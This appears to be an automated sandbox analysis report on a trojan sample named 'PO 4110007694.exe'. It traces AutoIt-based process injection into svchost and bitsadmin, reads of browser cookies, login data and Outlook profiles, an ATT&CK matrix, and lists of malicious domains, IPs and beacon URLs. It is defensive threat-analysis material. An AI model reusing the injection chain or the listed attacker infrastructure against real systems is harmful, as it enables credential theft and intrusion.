                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\PO 4110007694.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\bitsadmin.exe Section loaded: NULL target: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe protection: read write
                Source: C:\Windows\SysWOW64\bitsadmin.exe Section loaded: NULL target: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\bitsadmin.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\bitsadmin.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\bitsadmin.exe Thread register set: target process: 2836
                Source: C:\Windows\SysWOW64\bitsadmin.exe Thread APC queued: target process: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                Source: C:\Users\user\Desktop\PO 4110007694.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2B1D008
                Source: C:\Users\user\Desktop\PO 4110007694.exe Code function: 0_2_00C687B1 LogonUserW
                Source: C:\Users\user\Desktop\PO 4110007694.exe Code function: 0_2_00C13B3A GetCurrentDirectoryW, IsDebuggerPresent, GetFullPathNameW, SetCurrentDirectoryW, MessageBoxA, SetCurrentDirectoryW, GetForegroundWindow, ShellExecuteW
                Source: C:\Users\user\Desktop\PO 4110007694.exe Code function: 0_2_00C148D7 GetForegroundWindow, FindWindowW, IsIconic, ShowWindow, SetForegroundWindow, GetWindowThreadProcessId, GetWindowThreadProcessId, GetCurrentThreadId, GetWindowThreadProcessId, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput, SetForegroundWindow, MapVirtualKeyW, MapVirtualKeyW, keybd_event, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, MapVirtualKeyW, keybd_event, SetForegroundWindow, AttachThreadInput, AttachThreadInput, AttachThreadInput, AttachThreadInput
                Source: C:\Users\user\Desktop\PO 4110007694.exe Code function: 0_2_00C74C53 mouse_event
                Source: C:\Users\user\Desktop\PO 4110007694.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO 4110007694.exe"
                Source: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
                Source: C:\Windows\SysWOW64\bitsadmin.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO 4110007694.exe Code function: 0_2_00C67CAF GetSecurityDescriptorDacl, _memset, GetAclInformation, GetLengthSid, GetAce, AddAce, GetLengthSid, GetProcessHeap, HeapAlloc, GetLengthSid, CopySid, AddAce, SetSecurityDescriptorDacl, SetUserObjectSecurity
                Source: C:\Users\user\Desktop\PO 4110007694.exe Code function: 0_2_00C6874B AllocateAndInitializeSid, CheckTokenMembership, FreeSid
                Source: PO 4110007694.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: PO 4110007694.exe, hLRGQqcplWvpUw.exe, 00000002.00000000.1807326690.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000002.4114441882.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4114749950.0000000001570000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: hLRGQqcplWvpUw.exe, 00000002.00000000.1807326690.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000002.4114441882.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4114749950.0000000001570000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: hLRGQqcplWvpUw.exe, 00000002.00000000.1807326690.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000002.4114441882.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4114749950.0000000001570000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: hLRGQqcplWvpUw.exe, 00000002.00000000.1807326690.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000002.4114441882.00000000016D0000.00000002.00000001.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4114749950.0000000001570000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\PO 4110007694.exe Code function: 0_2_00C3862B cpuid
                Source: C:\Users\user\Desktop\PO 4110007694.exe Code function: 0_2_00C44E87 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter
                Source: C:\Users\user\Desktop\PO 4110007694.exe Code function: 0_2_00C51E06 GetUserNameW
                Source: C:\Users\user\Desktop\PO 4110007694.exe Code function: 0_2_00C43F3A __lock, ____lc_codepage_func, __getenv_helper_nolock, _free, _strlen, __malloc_crt, _strlen, __invoke_watson, _free, GetTimeZoneInformation, WideCharToMultiByte, WideCharToMultiByte
                Source: C:\Users\user\Desktop\PO 4110007694.exe Code function: 0_2_00C149A0 GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, GetSystemInfo

                Stealing of Sensitive Information

                Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000004.00000002.4114791942.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4117111147.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000001.00000002.1895662906.0000000006D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.4113656138.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.4114738212.0000000003230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000001.00000002.1883944233.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000001.00000002.1885773704.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.4114931150.0000000004180000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\bitsadmin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\bitsadmin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\bitsadmin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\bitsadmin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\bitsadmin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\bitsadmin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\bitsadmin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\bitsadmin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\bitsadmin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: PO 4110007694.exe Binary or memory string: WIN_81
                Source: PO 4110007694.exe Binary or memory string: WIN_XP
                Source: PO 4110007694.exe Binary or memory string: WIN_XPe
                Source: PO 4110007694.exe Binary or memory string: WIN_VISTA
                Source: PO 4110007694.exe Binary or memory string: WIN_7
                Source: PO 4110007694.exe Binary or memory string: WIN_8
                Source: PO 4110007694.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000004.00000002.4114791942.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4117111147.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000001.00000002.1895662906.0000000006D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.4113656138.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.4114738212.0000000003230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000001.00000002.1883944233.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000001.00000002.1885773704.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.4114931150.0000000004180000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PO 4110007694.exe Code function: 0_2_00C86283 socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket
                Source: C:\Users\user\Desktop\PO 4110007694.exe Code function: 0_2_00C86747 socket, WSAGetLastError, bind, WSAGetLastError, closesocket
MITRE ATT&CK Matrix (a number in front of a technique name is the report's signature-count badge for that technique; cells without a number are the unmatched techniques of the matrix template)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 251 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (ID: 1568199; Sample: PO 4110007694.exe; Start date: 04/12/2024; Architecture: WINDOWS; Score: 100)

Sample-level DNS/IP info: www.soainsaat.xyz; www.duwixushx.xyz; 15 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures
Signature attached to www.duwixushx.xyz: Performs DNS queries to domains with low reputation

Process tree:
PO 4110007694.exe (started)
  Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Maps a DLL or memory area into another process
  svchost.exe (started by PO 4110007694.exe)
    Signatures: Maps a DLL or memory area into another process
    hLRGQqcplWvpUw.exe (injected by svchost.exe)
      Signatures: Found direct / indirect Syscall (likely to bypass EDR)
      bitsadmin.exe (started by the injected hLRGQqcplWvpUw.exe)
        Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
        hLRGQqcplWvpUw.exe (injected by bitsadmin.exe)
          Signatures: Found direct / indirect Syscall (likely to bypass EDR)
          DNS/IP info: www.duwixushx.xyz 156.251.17.224, ports 50045, 50046, 50047, POWERLINE-AS-APPOWERLINEDATACENTERHK, Seychelles; www.7vh2wy.top 20.2.249.7, ports 50041, 50042, 50043, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States; 11 other IPs or domains
        firefox.exe (started by bitsadmin.exe)

Source | Detection | Scanner | Label
PO 4110007694.exe | 39% | ReversingLabs | Win32.Trojan.AutoitInject
PO 4110007694.exe | 100% | Joe Sandbox ML | -
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://www.t91rl7.pro/jhb8/?BTPDLZX=0R31+Vq/Nm8msnga4XjSJ8sAfUwJuuARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0Pp97wC6ZYoPeW6DxktAXnOuh3ha64INvKA=&WnQdf=JhLPW | 0% | Avira URL Cloud | safe
http://www.laohub10.net/sgdd/ | 0% | Avira URL Cloud | safe
http://www.yvcp3.info/x20l/?BTPDLZX=fuPwFllnLQvzi1y5p/ZpnhRgNM4mXlCpPG7RIdaZj/0kEynSdOAf8+xad2xabD02Zo5QEVuMD42Ooe6vMAhBaOmt5mAtHSKuJTa6Be4mvNoGTYEsb86Lrhw=&WnQdf=JhLPW | 0% | Avira URL Cloud | safe
http://server/get.asp | 0% | Avira URL Cloud | safe
http://www.soainsaat.xyz/rum2/ | 100% | Avira URL Cloud | malware
http://www.rafconstrutora.online/1jao/ | 0% | Avira URL Cloud | safe
http://www.amayavp.xyz/d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K7yngZPbDkFJ2MbPrWQrwotde8x+DERdOM8=&WnQdf=JhLPW | 100% | Avira URL Cloud | malware
http://www.yvcp3.info | 0% | Avira URL Cloud | safe
http://www.duwixushx.xyz/q0vk/ | 100% | Avira URL Cloud | malware
http://www.nb-shenshi.buzz/xxr1/?BTPDLZX=CTzPrZCB9Fii6KjTMWJ2M/WncddfpG5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66jciILoGQdVc74SRxgXHJUi2AjDZRtSfQFA=&WnQdf=JhLPW | 0% | Avira URL Cloud | safe
http://www.vayui.top/vg0z/ | 0% | Avira URL Cloud | safe
http://www.vayui.top/vg0z/?BTPDLZX=75uk3ictCfC5d95gANF2nAu8q1moq+7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGs6PncMbbDAs+z7vTlvvSa3jEJyrffOxyRk=&WnQdf=JhLPW | 0% | Avira URL Cloud | safe
http://www.7vh2wy.top/n7xy/ | 0% | Avira URL Cloud | safe
http://www.rgenerousrs.store/o362/ | 0% | Avira URL Cloud | safe
http://www.t91rl7.pro/jhb8/ | 0% | Avira URL Cloud | safe
http://www.xcvbj.asia/rq1s/?WnQdf=JhLPW&BTPDLZX=8hQq9qCyJ4Zif0sZJ+qpsVVSiE3f8un3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1d98q0hIrZL7k5AWWxKgNnUzBpRStLOb73o= | 0% | Avira URL Cloud | safe
http://www.7vh2wy.top/n7xy/?BTPDLZX=9kSByHmOdk8FUTJr+o8A3syTDbhMAn0rzNXDmTbYjaiqM3Vah8l/01w+tC+kGtOMFeVLDvKv+EgDTRurueNSiIvCBTHBcXkQVH4UQznoZd4uvjqdn9ipXGI=&WnQdf=JhLPW | 0% | Avira URL Cloud | safe
http://www.learnwithus.site/alu5/ | 0% | Avira URL Cloud | safe
http://www.laohub10.net/sgdd/?BTPDLZX=n1rc2pzYlnLUqZJl2DrPSNjVvvG+B3kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSkv0BSFGr8wnshHLEWZTEWF2XmR1RoCWC90=&WnQdf=JhLPW | 0% | Avira URL Cloud | safe
http://www.rgenerousrs.store/o362/?WnQdf=JhLPW&BTPDLZX=FaNItuPk5TcZ9HdSZBH/qM9rY38VGyvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqDzGT3SCCEwZiMzsN5+71dEwGtSagaXjd4i8= | 0% | Avira URL Cloud | safe
http://www.amayavp.xyz/d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3 | 100% | Avira URL Cloud | malware
http://www.xcvbj.asia/rq1s/ | 0% | Avira URL Cloud | safe
http://www.amayavp.xyz/d9ku/ | 100% | Avira URL Cloud | malware
http://www.yvcp3.info/x20l/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.vayui.top | 104.21.95.160 | true | false | - | high
www.amayavp.xyz | 185.27.134.144 | true | false | - | high
www.7vh2wy.top | 20.2.249.7 | true | true | - | unknown
r0lqcud7.nbnnn.xyz | 27.124.4.246 | true | false | - | high
www.xcvbj.asia | 149.88.81.190 | true | false | - | high
www.duwixushx.xyz | 156.251.17.224 | true | true | - | unknown
www.rafconstrutora.online | 104.21.34.103 | true | true | - | unknown
www.rgenerousrs.store | 104.21.57.248 | true | false | - | high
natroredirect.natrocdn.com | 85.159.66.93 | true | false | - | high
www.learnwithus.site | 209.74.77.107 | true | false | - | high
www.yvcp3.info | 47.254.140.255 | true | true | - | unknown
www.nb-shenshi.buzz | 161.97.168.245 | true | false | - | high
www.t91rl7.pro | 154.88.22.101 | true | false | - | high
www.cuthethoi.online | unknown | unknown | false | - | unknown
www.soainsaat.xyz | unknown | unknown | true | - | unknown
www.laohub10.net | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
http://www.yvcp3.info/x20l/?BTPDLZX=fuPwFllnLQvzi1y5p/ZpnhRgNM4mXlCpPG7RIdaZj/0kEynSdOAf8+xad2xabD02Zo5QEVuMD42Ooe6vMAhBaOmt5mAtHSKuJTa6Be4mvNoGTYEsb86Lrhw=&WnQdf=JhLPW | true | Avira URL Cloud: safe | unknown
http://www.amayavp.xyz/d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K7yngZPbDkFJ2MbPrWQrwotde8x+DERdOM8=&WnQdf=JhLPW | true | Avira URL Cloud: malware | unknown
http://www.duwixushx.xyz/q0vk/ | true | Avira URL Cloud: malware | unknown
http://www.soainsaat.xyz/rum2/ | true | Avira URL Cloud: malware | unknown
http://www.rafconstrutora.online/1jao/ | true | Avira URL Cloud: safe | unknown
http://www.nb-shenshi.buzz/xxr1/?BTPDLZX=CTzPrZCB9Fii6KjTMWJ2M/WncddfpG5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66jciILoGQdVc74SRxgXHJUi2AjDZRtSfQFA=&WnQdf=JhLPW | true | Avira URL Cloud: safe | unknown
http://www.t91rl7.pro/jhb8/?BTPDLZX=0R31+Vq/Nm8msnga4XjSJ8sAfUwJuuARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0Pp97wC6ZYoPeW6DxktAXnOuh3ha64INvKA=&WnQdf=JhLPW | true | Avira URL Cloud: safe | unknown
http://www.laohub10.net/sgdd/ | true | Avira URL Cloud: safe | unknown
http://www.vayui.top/vg0z/ | true | Avira URL Cloud: safe | unknown
http://www.vayui.top/vg0z/?BTPDLZX=75uk3ictCfC5d95gANF2nAu8q1moq+7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTGs6PncMbbDAs+z7vTlvvSa3jEJyrffOxyRk=&WnQdf=JhLPW | true | Avira URL Cloud: safe | unknown
http://www.t91rl7.pro/jhb8/ | true | Avira URL Cloud: safe | unknown
http://www.rgenerousrs.store/o362/ | true | Avira URL Cloud: safe | unknown
http://www.7vh2wy.top/n7xy/?BTPDLZX=9kSByHmOdk8FUTJr+o8A3syTDbhMAn0rzNXDmTbYjaiqM3Vah8l/01w+tC+kGtOMFeVLDvKv+EgDTRurueNSiIvCBTHBcXkQVH4UQznoZd4uvjqdn9ipXGI=&WnQdf=JhLPW | true | Avira URL Cloud: safe | unknown
http://www.xcvbj.asia/rq1s/?WnQdf=JhLPW&BTPDLZX=8hQq9qCyJ4Zif0sZJ+qpsVVSiE3f8un3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1d98q0hIrZL7k5AWWxKgNnUzBpRStLOb73o= | true | Avira URL Cloud: safe | unknown
http://www.learnwithus.site/alu5/ | true | Avira URL Cloud: safe | unknown
http://www.7vh2wy.top/n7xy/ | true | Avira URL Cloud: safe | unknown
http://www.laohub10.net/sgdd/?BTPDLZX=n1rc2pzYlnLUqZJl2DrPSNjVvvG+B3kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSkv0BSFGr8wnshHLEWZTEWF2XmR1RoCWC90=&WnQdf=JhLPW | true | Avira URL Cloud: safe | unknown
http://www.rgenerousrs.store/o362/?WnQdf=JhLPW&BTPDLZX=FaNItuPk5TcZ9HdSZBH/qM9rY38VGyvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqDzGT3SCCEwZiMzsN5+71dEwGtSagaXjd4i8= | true | Avira URL Cloud: safe | unknown
http://www.xcvbj.asia/rq1s/ | true | Avira URL Cloud: safe | unknown
http://www.yvcp3.info/x20l/ | true | Avira URL Cloud: safe | unknown
http://www.amayavp.xyz/d9ku/ | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://server/get.asp | svchost.exe, 00000001.00000003.1851384519.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851083063.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000003.2206906784.000000000114B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.yvcp3.info | hLRGQqcplWvpUw.exe, 00000007.00000002.4117111147.0000000005445000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.hostgator.com.br | bitsadmin.exe, 00000004.00000002.4115599772.0000000004EC8000.00000004.10000000.00040000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4115123582.0000000004348000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.amayavp.xyz/d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3 | bitsadmin.exe, 00000004.00000002.4115599772.000000000455C000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4117808293.0000000006540000.00000004.00000800.00020000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4115123582.00000000039DC000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | bitsadmin.exe, 00000004.00000002.4118254849.0000000007FC8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
209.74.77.107 | www.learnwithus.site | United States | 31744 | MULTIBAND-NEWHOPEUS | false
104.21.34.103 | www.rafconstrutora.online | United States | 13335 | CLOUDFLARENETUS | true
185.27.134.144 | www.amayavp.xyz | United Kingdom | 34119 | WILDCARD-ASWildcardUKLimitedGB | false
27.124.4.246 | r0lqcud7.nbnnn.xyz | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | false
20.2.249.7 | www.7vh2wy.top | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
104.21.95.160 | www.vayui.top | United States | 13335 | CLOUDFLARENETUS | false
